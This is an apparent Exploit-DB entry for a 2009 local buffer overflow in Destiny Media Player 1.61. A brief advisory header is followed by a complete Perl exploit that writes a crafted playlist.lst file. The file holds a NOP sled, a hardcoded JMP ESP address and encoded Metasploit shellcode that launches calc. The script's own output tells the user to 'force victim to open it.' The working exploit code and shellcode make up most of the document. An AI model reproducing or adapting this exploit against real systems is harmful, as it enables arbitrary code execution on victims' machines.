Destiny Media Player 1.61 Local BoF Code

vendor:

Destiny Media Player

by:

sCORPINo

9.3

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Destiny Media Player

Affected Version From: 1.61

Affected Version To: 1.61

Patch Exists: YES

Related CWE: N/A

CPE: a:destiny_media_player:destiny_media_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Destiny Media Player 1.61 Local BoF Code

Destiny Media Player 1.61 is vulnerable to a buffer overflow vulnerability when a specially crafted playlist.lst file is opened. This allows an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Destiny Media Player

Source

Exploit-DB raw data:

#!/user/bin/perl
#Destiny Media Player 1.61 Local BoF Code
#Exploit Coded by : sCORPINo
#Snoop Security Researching Committe 
#originally discovered by: Encrypt3d.M!nd

# windows/exec - 142 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=thread, CMD=calc
$shellcode =
"\x6a\x1e\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64" .
"\xfc\xb1\x5d\x83\xeb\xfc\xe2\xf4\x98\x14\xf5\x5d\x64\xfc" .
"\x3a\x18\x58\x77\xcd\x58\x1c\xfd\x5e\xd6\x2b\xe4\x3a\x02" .
"\x44\xfd\x5a\x14\xef\xc8\x3a\x5c\x8a\xcd\x71\xc4\xc8\x78" .
"\x71\x29\x63\x3d\x7b\x50\x65\x3e\x5a\xa9\x5f\xa8\x95\x59" .
"\x11\x19\x3a\x02\x40\xfd\x5a\x3b\xef\xf0\xfa\xd6\x3b\xe0" .
"\xb0\xb6\xef\xe0\x3a\x5c\x8f\x75\xed\x79\x60\x3f\xee\x6c" .
"\x92\x9c\xe7\x39\xef\xba\x81\xd6\x24\xf0\x3a\x2d\x78\x51" .
"\x3a\x35\x6c\x75\x49\xde\xa4\x96\xe1\x35\x8b\x32\x51\x3d" .
"\x0c\x64\x4f\xd7\x6a\xab\x4e\xba\x07\x9d\xdd\x3e\x64\xfc" .
"\xb1\x5d";
$nops = "\x90" x 2052;  	 #fill the buffer
$nops2 = "\x90" x 100;		 #fill the buffer more:p
$eip = "\x65\x82\xA5\x7c";	 #7CA58265 JMP ESP
$attack = $nops.$eip.$nops.$shellcode; #sandwich
$playlist="playlist.lst";    #playlist name,chage it to anything you want
intro();

open($FILE, ">$playlist");
print $FILE $attack;
close($FILE);
print "\n\n\n$playlist created beside this exploit.\n";
print "force victim to open it with Destiny Media Player 1.61\n";
print "good luck\n\n";

sub intro{
print qq(
############################################################
##        Snoop Security Researching Committe             ##
##               www.snoop-security.com                   ##
##                    sCORPINo                            ##
## Destiny Media Player 1.61 Local BoF Code               ##
## found by:                                              ##
## http://www.milw0rm.com/exploits/7652                   ##
## special tnX to:                                        ##
## Shahriyar, Adel, Alireza, Yashar and all snoop members ##
## just run and open the playlist.lst with                ##
## Destiny Media Player.then BOOM !                       ##
############################################################
);
}

# milw0rm.com [2009-01-04]